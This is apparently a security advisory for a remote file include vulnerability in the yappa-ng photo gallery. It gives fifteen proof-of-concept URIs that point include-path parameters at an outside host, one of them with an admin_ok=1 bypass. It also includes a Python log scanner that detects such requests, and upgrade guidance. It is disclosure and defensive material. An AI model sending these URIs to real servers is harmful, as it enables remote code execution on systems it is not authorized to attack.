Yappa-NG Unspecified Remote File Include Vulnerability
Info
| Bugtraq ID: | 13371 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 24 2005 12:00AM |
| Updated: | Apr 24 2005 12:00AM |
| Credit: | Discovery is credited to James Bercegay of the GulfTech Security Research Team. |
| Vulnerable: | yappa-ng yappa-ng 2.3.1; yappa-ng yappa-ng 2.3.0; yappa-ng yappa-ng 2.2.2; yappa-ng yappa-ng 2.2.1; yappa-ng yappa-ng 2.2.0; yappa-ng yappa-ng 2.1.0; yappa-ng yappa-ng 2.0.1; yappa-ng yappa-ng 2.0.0; yappa-ng yappa-ng 1.6; yappa-ng yappa-ng 1.5; yappa-ng yappa-ng 1.4; yappa-ng yappa-ng 1.3; yappa-ng yappa-ng 1.2; yappa-ng yappa-ng 1.1; yappa-ng yappa-ng 1.0; yappa-ng yappa-ng 0.9 |
| Not Vulnerable: | yappa-ng yappa-ng 2.3.2 |
Discussion
yappa-ng is prone to a remote file include vulnerability. This issue may let remote attackers include and execute malicious remote PHP scripts.
The vendor has not published any specific details about this vulnerability other than stating that it is addressed in the 2.3.2 security release of the software.
Exploit / POC
There is no exploit required.
The following proof-of-concept URIs are available:
http://www.example.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_overview.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_leftnavbar.inc.php?config[path_src_include]=http://www.example.com/&config[show_album_desc_prev]=yes
http://www.example.com/src/index_image.inc.php?config[path_src_include]=http://www.example.com/&config[show_comments]=1&config_album[show_comments]=1
http://www.example.com/src/image-gd.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/image.class.php?config[path_src_include]=http://www.example.com/&config[image_module]=blah
http://www.example.com/src/album.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/show_random.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/main.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.example.com/
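For defenders, the request shape in the URIs above can be searched for in web server access logs. The following is an added example, not code from the advisory or from yappa-ng: it flags any request that supplies a `config[path_*_include]` parameter and marks whether the value points at another host. The generalized parameter pattern, the log format and the sample lines are assumptions constructed for illustration; it treats any client-supplied include-path parameter as suspicious, on the assumption that legitimate clients never send one.

```python
import re
from urllib.parse import parse_qsl

# Parameter shape taken from the proof-of-concept URIs: config[path_src_include],
# config[path_admin_include]. Matching any config[path_*_include] is a generalization.
INCLUDE_PARAM = re.compile(r"^config\[path_\w+_include\]$")
# Value that points the include path at another host: "scheme://..." or "//host".
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.IGNORECASE)
# Request line of a common/combined-format access log entry (assumed log format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def include_overrides(target):
    """Return [(path, param, is_remote)] for include-path overrides in a request target."""
    path, _, query = target.partition("?")
    found = []
    # parse_qsl percent-decodes names and values, so config%5Bpath_src_include%5D
    # is caught as well as the literal bracket form.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if INCLUDE_PARAM.match(name):
            found.append((path, name, bool(REMOTE_VALUE.match(value))))
    return found


def scan(lines):
    """Return [(line_number, path, param, is_remote)] for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        request = REQUEST_LINE.search(line)
        if request:
            hits.extend((number,) + hit for hit in include_overrides(request.group(1)))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Apr/2005:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Apr/2005:10:00:05 +0000] "GET /src/main.inc.php?config[path_src_include]=http://www.example.com/ HTTP/1.1" 200 312',
    '198.51.100.7 - - [24/Apr/2005:10:00:06 +0000] "GET /admin_modules/admin_module_edit.inc.php?config%5Bpath_src_include%5D=http%3A%2F%2Fwww.example.com%2F HTTP/1.0" 200 298',
    '198.51.100.7 - - [24/Apr/2005:10:00:07 +0000] "GET /src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.example.com/ HTTP/1.1" 200 301',
    '203.0.113.4 - - [24/Apr/2005:10:02:11 +0000] "GET /src/album.class.php?config[path_src_include]=./src/ HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only the request line is inspected, so parameters sent in a POST body are not covered by this check.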
Solution / Fix
Solution:
This issue has been addressed in the 2.3.2 security release of the software.
Each vulnerable version listed above is fixed by upgrading to yappa-ng yappa-ng 2.3.2:
http://sourceforge.net/project/showfiles.php?group_id=70802
References
References:
- 2.3.2 Security Release (yappa-ng)
- Vendor Homepage (In-Portal)
- Yappa-NG Multiple Vulnerabilities (GulfTech Security Research)